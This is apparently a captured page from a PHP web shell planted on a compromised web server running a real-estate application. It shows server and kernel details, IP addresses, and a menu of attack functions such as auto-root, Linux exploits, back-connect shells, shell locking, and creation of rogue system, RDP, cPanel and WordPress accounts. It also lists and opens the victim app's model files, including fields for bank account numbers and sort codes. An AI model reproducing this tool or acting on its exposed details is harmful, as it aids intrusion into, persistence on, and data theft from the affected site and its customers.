Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.187.75
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
realestate /
source /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
AlertMethod.php
182
B
-rwxr-xr-x
Applicant.php
2.98
KB
-rwxr-xr-x
ApplicantFile.php
362
B
-rwxr-xr-x
ApplicantPreset.php
315
B
-rw-r--r--
ApplicantUserDetail.php
669
B
-rwxr-xr-x
Area.php
480
B
-rwxr-xr-x
Branch.php
2.25
KB
-rwxr-xr-x
BuyType.php
237
B
-rwxr-xr-x
Category.php
505
B
-rwxr-xr-x
Country.php
464
B
-rwxr-xr-x
Directory.php
1.4
KB
-rwxr-xr-x
DirectoryAddress.php
624
B
-rwxr-xr-x
DirectoryAttachment.php
424
B
-rwxr-xr-x
DirectoryCustomField.php
191
B
-rwxr-xr-x
Label.php
412
B
-rwxr-xr-x
Landlord.php
2.08
KB
-rwxr-xr-x
LandlordUserDetail.php
665
B
-rwxr-xr-x
Landlordfile.php
357
B
-rwxr-xr-x
LettingsPW.php
309
B
-rwxr-xr-x
Module.php
578
B
-rwxr-xr-x
OccupierType.php
242
B
-rwxr-xr-x
PostalCode.php
180
B
-rwxr-xr-x
PropertyAlert.php
481
B
-rwxr-xr-x
PropertyType.php
316
B
-rwxr-xr-x
Source.php
408
B
-rwxr-xr-x
SpecialFeature.php
432
B
-rwxr-xr-x
User.php
1.09
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Directory.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class Directory extends Model { use HasFactory; /** * The attributes that are mass assignable. * * @var array */ protected $fillable = [ 'category', 'company', 'telephone', 'mobile', 'email', 'web_address', 'dx', 'fax', 'branch', 'comments', 'other_info', 'subscription', 'bank_body', 'account_no', 'sort_code', 'account_name', 'beneficiary_reference', 'address_line_1', 'address_line_2', 'town', 'county', 'postcode', 'country', 'bank_branch_address_line_1', 'bank_branch_address_line_2', 'bank_town', 'bank_county', 'bank_country', 'notify_post', 'notify_phone','notify_sms','notify_email','notify_property_alerts','notify_general_news','notify_special_offers' ]; public function directoryAddresses() { return $this->hasMany(DirectoryAddress::class, 'directory_id'); } public function directoryAttachments() { return $this->hasMany(DirectoryAttachment::class, 'directory_id'); } public function categories() { return $this->belongsTo(Category::class, 'category', 'id'); } }
Close